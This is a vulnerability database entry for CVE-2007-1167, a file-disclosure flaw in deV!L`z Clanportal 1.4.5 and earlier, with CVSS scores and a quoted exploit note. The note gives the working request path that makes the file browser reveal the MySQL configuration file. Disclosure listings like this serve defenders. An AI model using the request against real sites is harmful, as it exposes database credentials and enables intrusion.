5
CVSSv2

CVE-2007-1167

Published: 02/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

inc/filebrowser/browser.php in deV!L`z Clanportal (DZCP) 1.4.5 and previous versions allows remote malicious users to obtain MySQL data via the inc/mysql.php value of the file parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

dzcp dev\\!l\\'z clanportal

Exploits

# DZCP (Devilz Clanportal) <= 145 Mysql Data viewable # Found by: Kiba # Solution: Install security Fix! # Exploit: [SITE]/[PATH]/inc/filebrowser/browserphp?file=inc/mysqlphp Example: wwwexamplecom/dzcp/inc/filebrowser/browserphp?file=inc/mysqlphp # milw0rmcom [2007-02-21] ...